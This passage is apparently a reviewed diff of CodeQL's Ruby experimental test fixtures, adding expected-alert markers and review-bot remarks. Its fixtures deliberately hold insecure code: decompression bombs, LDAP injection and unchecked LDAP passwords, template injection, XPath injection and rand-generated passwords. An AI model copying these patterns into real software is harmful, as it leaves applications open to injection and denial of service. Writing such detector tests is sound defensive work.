Zlib::GzipReader.new(File.open(gzip_path, 'rb')).each do |entry| + Zlib::GzipReader.new(File.open(gzip_path, 'rb')).read # $ Alert + Zlib::GzipReader.new(File.open(gzip_path, 'rb')).each do |entry| # $ Alert puts entry end - Zlib::GzipReader.zcat(open(gzip_path)) + Zlib::GzipReader.zcat(open(gzip_path)) # $ Alert end diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/zipBombs.rb b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/zipBombs.rb index 5aab5ce63827..9d0d047b0358 100644 --- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/zipBombs.rb +++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/zipBombs.rb 
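Review bot: The two `end # $ Alert` markers in this hunk are easy to misread as annotating nothing, because the call being flagged is the `Zlib::GzipReader.open(gzip_path) do |uncompressedfile|` line several lines above each of them. The expected output lists those results as `gzipBombs.rb:7:3:9:5` and `gzipBombs.rb:10:3:14:5`, so the marker apparently has to sit on the last line of the multi-line call. A short comment at the first one, such as `# alert location spans the whole block, so the expectation sits on its closing end`, would stop a later cleanup from moving the marker up to the `open` line. The same applies to the two `end # $ Alert` lines in the first zipBombs.rb hunk.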
@@ -1,21 +1,21 @@ require 'zip' class TestController < ActionController::Base - zipfile_path = params[:path] + zipfile_path = params[:path] # $ Source Zip::InputStream.open(zipfile_path) do |input| while (entry = input.get_next_entry) puts :file_name, entry.name input end - end + end # $ Alert Zip::InputStream.open(zipfile_path) do |input| input.read - end - input = Zip::InputStream.open(zipfile_path) + end # $ Alert + input = Zip::InputStream.open(zipfile_path) # $ Alert - Zip::File.open(zipfile_path).read "10GB" - Zip::File.open(zipfile_path).extract "10GB", "./" + Zip::File.open(zipfile_path).read "10GB" # $ Alert + Zip::File.open(zipfile_path).extract "10GB", "./" # $ Alert Zip::File.open(zipfile_path) do |zip_file| # Handle entries one by one @@ -25,33 +25,33 @@ class TestController < ActionController::Base # Extract to file or directory based on name in the archive entry.extract # Read into memory - entry.get_input_stream.read + entry.get_input_stream.read # $ Alert end end zip_file = Zip::File.open(zipfile_path) zip_file.each do |entry| - entry.extract - entry.get_input_stream.read + entry.extract # $ Alert + entry.get_input_stream.read # $ Alert end # Find specific entry Zip::File.open(zipfile_path) do |zip_file| zip_file.glob('*.xml').each do |entry| - zip_file.read(entry.name) - entry.extract + zip_file.read(entry.name) # $ Alert + entry.extract # $ Alert end entry = zip_file.glob('*.csv').first raise 'File too large when extracted' if entry.size > MAX_SIZE - puts entry.get_input_stream.read + puts entry.get_input_stream.read # $ Alert end zip_file = Zip::File.open(zipfile_path) entry = zip_file.glob('*.csv') - puts entry.get_input_stream.read + puts entry.get_input_stream.read # $ Alert zip_file = Zip::File.open(zipfile_path) zip_file.glob('*') do |entry| - entry.get_input_stream.read + entry.get_input_stream.read # $ Alert end end 
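Review bot: In the second hunk, `puts entry.get_input_stream.read # $ Alert` comes directly after `raise 'File too large when extracted' if entry.size > MAX_SIZE`, and a plain `Alert` records that guarded read as a true positive without saying why. If the intent is that `entry.size` is the size declared in the archive and so does not bound the bytes actually decompressed, state it above the read, e.g. `# BAD: entry.size comes from archive metadata, so this guard does not limit the decompressed output`. If the guard is meant to be sufficient, the marker should instead be `# $ SPURIOUS: Alert`, so the false positive stays tracked rather than blessed. Either way, this is the one case in the fixture where a reader cannot tell from the code alone which outcome is intended.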
diff --git a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected index 635cfcd4b3e7..da8f84eabfba 100644 --- a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected +++ b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected @@ -1,3 +1,6 @@ +#select +| ImproperLdapAuth.rb:15:23:15:26 | pass | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:15:23:15:26 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:5:12:5:17 | call to params | user-provided value | +| ImproperLdapAuth.rb:31:24:31:27 | pass | ImproperLdapAuth.rb:24:12:24:17 | call to params | ImproperLdapAuth.rb:31:24:31:27 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:24:12:24:17 | call to params | user-provided value | edges | ImproperLdapAuth.rb:5:5:5:8 | pass | ImproperLdapAuth.rb:15:23:15:26 | pass | provenance | | | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:5:12:5:24 | ...[...] | provenance | | @@ -15,6 +18,3 @@ nodes | ImproperLdapAuth.rb:24:12:24:24 | ...[...] | semmle.label | ...[...] | | ImproperLdapAuth.rb:31:24:31:27 | pass | semmle.label | pass | subpaths -#select -| ImproperLdapAuth.rb:15:23:15:26 | pass | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:15:23:15:26 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:5:12:5:17 | call to params | user-provided value | -| ImproperLdapAuth.rb:31:24:31:27 | pass | ImproperLdapAuth.rb:24:12:24:17 | call to params | ImproperLdapAuth.rb:31:24:31:27 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:24:12:24:17 | call to params | user-provided value | 
diff --git a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.qlref b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.qlref index 65f60a22b789..42e36ad38a87 100644 --- a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.qlref +++ b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.qlref @@ -1 +1,2 @@ -experimental/ldap-improper-auth/ImproperLdapAuth.ql \ No newline at end of file +query: experimental/ldap-improper-auth/ImproperLdapAuth.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.rb b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.rb index 2705158563e3..07dd430b9e4a 100644 --- a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.rb +++ b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is used directly as password # (i.e a remote flow source) - pass = params[:pass] + pass = params[:pass] # $ Source # BAD: user input is not sanitized ldap = Net::LDAP.new( @@ -12,7 +12,7 @@ def some_request_handler auth: { method: :simple, username: 'uid=admin,dc=example,dc=com', - password: pass + password: pass # $ Alert } ) ldap.bind @@ -21,14 +21,14 @@ def some_request_handler def some_request_handler # A string tainted by user input is used directly as password # (i.e a remote flow source) - pass = params[:pass] + pass = params[:pass] # $ Source # BAD: user input is not sanitized ldap = Net::LDAP.new ldap.host = your_server_ip_address ldap.encryption(:method => :simple_tls) ldap.port = 639 - ldap.auth "admin", pass + ldap.auth "admin", pass # $ Alert ldap.bind end end 
diff --git a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected index 581157b61235..36cb35dfaffb 100644 --- a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected +++ b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected @@ -1,6 +1,6 @@ +#select +| InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | This uses a cryptographically insecure random number generated at $@ in a security context. | InsecureRandomness.rb:6:42:6:57 | call to rand | call to rand | edges nodes | InsecureRandomness.rb:6:42:6:57 | call to rand | semmle.label | call to rand | subpaths -#select -| InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | This uses a cryptographically insecure random number generated at $@ in a security context. | InsecureRandomness.rb:6:42:6:57 | call to rand | call to rand | diff --git a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.qlref b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.qlref index 8d04d2154257..e3c5fbbad504 100644 --- a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.qlref +++ b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.qlref @@ -1 +1,2 @@ -experimental/insecure-randomness/InsecureRandomness.ql \ No newline at end of file +query: experimental/insecure-randomness/InsecureRandomness.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.rb b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.rb index 116957137b56..fa7427b1c66d 100644 
--- a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.rb +++ b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.rb @@ -3,7 +3,7 @@ def generate_password_1(length) chars = ('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a + ['!', '@', '#', '$', '%'] # BAD: rand is not cryptographically secure - password = (1..length).collect { chars[rand(chars.size)] }.join + password = (1..length).collect { chars[rand(chars.size)] }.join # $ Alert end def generate_password_2(length) diff --git a/ruby/ql/test/query-tests/experimental/LdapInjection/LdapInjection.rb b/ruby/ql/test/query-tests/experimental/LdapInjection/LdapInjection.rb index 966b26ef6364..ce4e848e59a1 100644 --- a/ruby/ql/test/query-tests/experimental/LdapInjection/LdapInjection.rb +++ b/ruby/ql/test/query-tests/experimental/LdapInjection/LdapInjection.rb @@ -2,11 +2,11 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is used directly as DN # (i.e a remote flow source) - dc = params[:dc] + dc = params[:dc] # $ Source # A string tainted by user input is used directly as search filter or attribute # (i.e a remote flow source) - name = params[:user_name] + name = params[:user_name] # $ Source # LDAP Connection ldap = Net::LDAP.new( 
@@ -22,20 +22,20 @@ def some_request_handler # BAD: user input is used as DN # where dc is unsanitized - ldap.search(base: "ou=people,dc=#{dc},dc=com", filter: "cn=George", attributes: [""]) + ldap.search(base: "ou=people,dc=#{dc},dc=com", filter: "cn=George", attributes: [""]) # $ Alert # BAD: user input is used as search filter # where name is unsanitized - ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=#{name}", attributes: [""]) + ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=#{name}", attributes: [""]) # $ Alert # BAD: user input is used as attribute # where name is unsanitized - ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=George", attributes: [name]) + ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=George", attributes: [name]) # $ Alert # BAD: user input is used as search filter # where name is unsanitized filter = Net::LDAP::Filter.eq('cn', name) - ldap.search(base: "ou=people,dc=example,dc=com", filter: filter, attributes: [""]) + ldap.search(base: "ou=people,dc=example,dc=com", filter: filter, attributes: [""]) # $ Alert # GOOD: user input is not used in the LDAP query result = ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=George", attributes: [""]) diff --git a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected index 1eec0daa4c4c..1e6ebba4f852 100644 --- a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected +++ b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected 
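Review bot: The `filter = Net::LDAP::Filter.eq('cn', name)` case is the one most likely to be mistaken for a safe pattern, yet its comment only repeats `user input is used as search filter`. `Filter.eq` passes the value through unescaped, so a comment such as `# BAD: Filter.eq does not escape the value` would explain why the `# $ Alert` on the following `ldap.search` is expected. The fixture would also benefit from a GOOD counterpart built with `Net::LDAP::Filter.equals('cn', name)`, which escapes filter metacharacters. Whether the query models that as a sanitizer is not visible here, so the new case may need `# $ SPURIOUS: Alert` at first. `some_request_handler` starts and ends outside this hunk.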
@@ -1,3 +1,8 @@ +#select +| LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | This LDAP query depends on a $@. | LdapInjection.rb:5:10:5:15 | call to params | user-provided value | +| LdapInjection.rb:29:62:29:73 | "cn=#{...}" | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:29:62:29:73 | "cn=#{...}" | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | +| LdapInjection.rb:33:87:33:92 | call to [] | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:33:87:33:92 | call to [] | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | +| LdapInjection.rb:38:62:38:67 | filter | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:38:62:38:67 | filter | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | edges | LdapInjection.rb:5:5:5:6 | dc | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | provenance | AdditionalTaintStep | | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:5:10:5:20 | ...[...] | provenance | | 
@@ -28,8 +33,3 @@ nodes | LdapInjection.rb:37:41:37:44 | name | semmle.label | name | | LdapInjection.rb:38:62:38:67 | filter | semmle.label | filter | subpaths -#select -| LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | This LDAP query depends on a $@. | LdapInjection.rb:5:10:5:15 | call to params | user-provided value | -| LdapInjection.rb:29:62:29:73 | "cn=#{...}" | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:29:62:29:73 | "cn=#{...}" | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | -| LdapInjection.rb:33:87:33:92 | call to [] | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:33:87:33:92 | call to [] | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | -| LdapInjection.rb:38:62:38:67 | filter | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:38:62:38:67 | filter | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.qlref b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.qlref index 7df75a91d969..f1164f044e6f 100644 --- a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.qlref +++ b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.qlref @@ -1 +1,2 @@ -experimental/ldap-injection/LdapInjection.ql \ No newline at end of file +query: experimental/ldap-injection/LdapInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/ErbInjection.rb b/ruby/ql/test/query-tests/experimental/TemplateInjection/ErbInjection.rb index 41b9d7069530..a433e4d54363 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/ErbInjection.rb 
+++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/ErbInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is inserted into a template # (i.e a remote flow source) - name = params[:name] + name = params[:name] # $ Source # Template with the source bad_text = " @@ -12,11 +12,11 @@ def some_request_handler # BAD: user input is evaluated # where name is unsanitized - template = ERB.new(bad_text).result(binding) + template = ERB.new(bad_text).result(binding) # $ Alert # BAD: user input is evaluated # where name is unsanitized - render inline: bad_text + render inline: bad_text # $ Alert # Template with the source good_text = " diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/SlimInjection.rb b/ruby/ql/test/query-tests/experimental/TemplateInjection/SlimInjection.rb index 07b93a20468b..05684b9454fa 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/SlimInjection.rb +++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/SlimInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is inserted into a template # (i.e a remote flow source) - name = params[:name] + name = params[:name] # $ Source # Template with the source (no sanitizer) bad_text = " @@ -11,7 +11,7 @@ def some_request_handler " % name # BAD: renders user input # where text is unsanitized - Slim::Template.new{ bad_text }.render + Slim::Template.new{ bad_text }.render # $ Alert # Template with the source (no sanitizer) bad2_text = " @@ -20,7 +20,7 @@ def some_request_handler " # BAD: renders user input # where text is unsanitized - Slim::Template.new{ bad2_text }.render + Slim::Template.new{ bad2_text }.render # $ Alert # Template with the source (no render) good_text = " 
diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected index cdb6045d4daf..2355550b9328 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected +++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected @@ -1,3 +1,8 @@ +#select +| ErbInjection.rb:15:24:15:31 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:15:24:15:31 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | +| ErbInjection.rb:19:20:19:27 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:19:20:19:27 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | +| SlimInjection.rb:14:25:14:32 | bad_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:14:25:14:32 | bad_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | +| SlimInjection.rb:23:25:23:33 | bad2_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:23:25:23:33 | bad2_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | edges | ErbInjection.rb:5:5:5:8 | name | ErbInjection.rb:8:5:8:12 | bad_text | provenance | | | ErbInjection.rb:5:5:5:8 | name | ErbInjection.rb:11:11:11:14 | name | provenance | | 
@@ -35,8 +40,3 @@ nodes | SlimInjection.rb:23:23:23:35 | { ... } : [lambda] [captured bad2_text] : String | semmle.label | { ... } : [lambda] [captured bad2_text] : String | | SlimInjection.rb:23:25:23:33 | bad2_text | semmle.label | bad2_text | subpaths -#select -| ErbInjection.rb:15:24:15:31 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:15:24:15:31 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | -| ErbInjection.rb:19:20:19:27 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:19:20:19:27 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | -| SlimInjection.rb:14:25:14:32 | bad_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:14:25:14:32 | bad_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | -| SlimInjection.rb:23:25:23:33 | bad2_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:23:25:23:33 | bad2_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.qlref b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.qlref index 38054e393eee..e783cc8cabbd 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.qlref +++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.qlref @@ -1 +1,2 @@ -experimental/template-injection/TemplateInjection.ql \ No newline at end of file +query: experimental/template-injection/TemplateInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/LibxmlInjection.rb b/ruby/ql/test/query-tests/experimental/XPathInjection/LibxmlInjection.rb index 3bde2f1e40b9..8a992b5ba36b 100644 
--- a/ruby/ql/test/query-tests/experimental/XPathInjection/LibxmlInjection.rb +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/LibxmlInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def libxml_handler(event:, context:) - name = params[:user_name] + name = params[:user_name] # $ Source xml = <<-XML @@ -18,13 +18,13 @@ def libxml_handler(event:, context:) results1 = doc.find_first('//foo') # BAD: XPath query is constructed from user input - results2 = doc.find_first("//#{name}") + results2 = doc.find_first("//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input results3 = doc.find('//foo') # BAD: XPath query is constructed from user input - results4 = doc.find("//#{name}") + results4 = doc.find("//#{name}") # $ Alert end end diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/NokogiriInjection.rb b/ruby/ql/test/query-tests/experimental/XPathInjection/NokogiriInjection.rb index e3ac8055f486..89f5fa5e8444 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/NokogiriInjection.rb +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/NokogiriInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def nokogiri_handler(event:, context:) - name = params[:user_name] + name = params[:user_name] # $ Source xml = <<-XML 
@@ -18,19 +18,19 @@ def nokogiri_handler(event:, context:) results1 = doc.at('//foo') # BAD: XPath query is constructed from user input - results2 = doc.at("//#{name}") + results2 = doc.at("//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input results3 = doc.xpath('//foo') # BAD: XPath query is constructed from user input - results4 = doc.xpath("//#{name}") + results4 = doc.xpath("//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input results5 = doc.at_xpath('//foo') # BAD: XPath query is constructed from user input - results6 = doc.at_xpath("//#{name}") + results6 = doc.at_xpath("//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input doc.xpath('//foo').each do |element| @@ -38,7 +38,7 @@ def nokogiri_handler(event:, context:) end # BAD: XPath query constructed from user input - doc.xpath("//#{name}").each do |element| + doc.xpath("//#{name}").each do |element| # $ Alert puts element.text end @@ -48,7 +48,7 @@ def nokogiri_handler(event:, context:) end # BAD: XPath query constructed from user input - doc.search("//#{name}").each do |element| + doc.search("//#{name}").each do |element| # $ Alert puts element.text end end diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/RexmlInjection.rb b/ruby/ql/test/query-tests/experimental/XPathInjection/RexmlInjection.rb index 6ee16d125b43..5b850c70ad4d 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/RexmlInjection.rb +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/RexmlInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def rexml_handler(event:, context:) - name = params[:user_name] + name = params[:user_name] # $ Source xml = <<-XML 
@@ -18,13 +18,13 @@ def rexml_handler(event:, context:) results1 = REXML::XPath.first(doc, "//foo") # BAD: XPath query is constructed from user input - results2 = REXML::XPath.first(doc, "//#{name}") + results2 = REXML::XPath.first(doc, "//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input results3 = REXML::XPath.match(doc, "//foo", nil) # BAD: XPath query is constructed from user input - results4 = REXML::XPath.match(doc, "//#{name}", nil) + results4 = REXML::XPath.match(doc, "//#{name}", nil) # $ Alert # GOOD: XPath query is not constructed from user input REXML::XPath.each(doc, "//foo") do |element| @@ -32,7 +32,7 @@ def rexml_handler(event:, context:) end # BAD: XPath query constructed from user input - REXML::XPath.each(doc, "//#{name}") do |element| + REXML::XPath.each(doc, "//#{name}") do |element| # $ Alert puts element.text end end diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected index 66ef14da3d7f..369a01c72f02 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected 
@@ -1,3 +1,14 @@ +#select +| LibxmlInjection.rb:21:31:21:41 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| LibxmlInjection.rb:27:25:27:35 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:21:23:21:33 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:21:23:21:33 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:27:26:27:36 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:27:26:27:36 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:33:29:33:39 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:33:29:33:39 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:41:15:41:25 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:41:15:41:25 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:51:16:51:26 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:51:16:51:26 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:21:40:21:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:21:40:21:50 | "//#{...}" | XPath expression depends on a $@. 
| RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:27:40:27:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:27:40:27:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:35:28:35:38 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:35:28:35:38 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | edges | LibxmlInjection.rb:5:5:5:8 | name | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | provenance | AdditionalTaintStep | | LibxmlInjection.rb:5:5:5:8 | name | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | provenance | AdditionalTaintStep | 
@@ -36,14 +47,3 @@ nodes | RexmlInjection.rb:27:40:27:50 | "//#{...}" | semmle.label | "//#{...}" | | RexmlInjection.rb:35:28:35:38 | "//#{...}" | semmle.label | "//#{...}" | subpaths -#select -| LibxmlInjection.rb:21:31:21:41 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| LibxmlInjection.rb:27:25:27:35 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:21:23:21:33 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:21:23:21:33 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:27:26:27:36 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:27:26:27:36 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:33:29:33:39 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:33:29:33:39 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:41:15:41:25 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:41:15:41:25 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:51:16:51:26 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:51:16:51:26 | "//#{...}" | XPath expression depends on a $@. 
